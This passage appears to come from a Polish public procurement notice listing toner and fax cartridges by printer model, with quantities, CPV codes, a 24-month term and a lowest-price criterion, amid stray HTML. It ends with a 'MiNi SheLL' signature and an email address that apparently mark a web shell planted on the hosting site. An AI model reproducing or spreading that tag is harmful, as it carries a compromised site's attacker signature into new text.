22.	KONICA MINOLTA BIZHUB C200	MINOLTA TN-214 NIEBIESKI lub równoważny	8
23.	KONICA MINOLTA MAGICOLOR 1690 MF	ZESTAW TONERÓW KONICA MINOLTA CMY 1690 CYAN MAGENTA YELLOW  AOV 30 NH  lub równoważny	8
24.	KONICA MINOLTA MAGICOLOR 1690 MF	MINOLTA 1690 BLACK lub równoważny	20
25.	BROTHER DCP8070D	TN 3230 CZARNY lub równoważny	2
26.	PANASONIC	DP-MB 300 lub równoważny	3
27.	XEROX	WORK CENTER  3550 lub równoważny	3
28. tonery kalkowe do faksów	
PANASONIC KX FA 136 a lub równoważny	20
PANASONIC KX FA 76 a lub równoważny	20
PANASONIC KX FA 57 lub równoważny	20
PANASONIC KX FA 137 lub równoważny	15
PANASONIC KX FA 52 lub równoważny	15
PANASONIC KX FA 134 lub równoważny	20
PANASONIC KX FA 87 lub równoważny	15
PANASONIC KX-FA 54 E KX-FP-148,KX-FB 141,143,145  lub równoważny	6;  FAKS LASEROWY PANASONIC KX-FL613	PANASONIC KX FA83 lub równoważny	20;
FAKS LASEROWY PANASONIC KX-MB 773	PANASONIC KX FAT 92 E  KX-MB 773  lub równoważny	10..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.12.51.10-5, 30.12.51.20-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com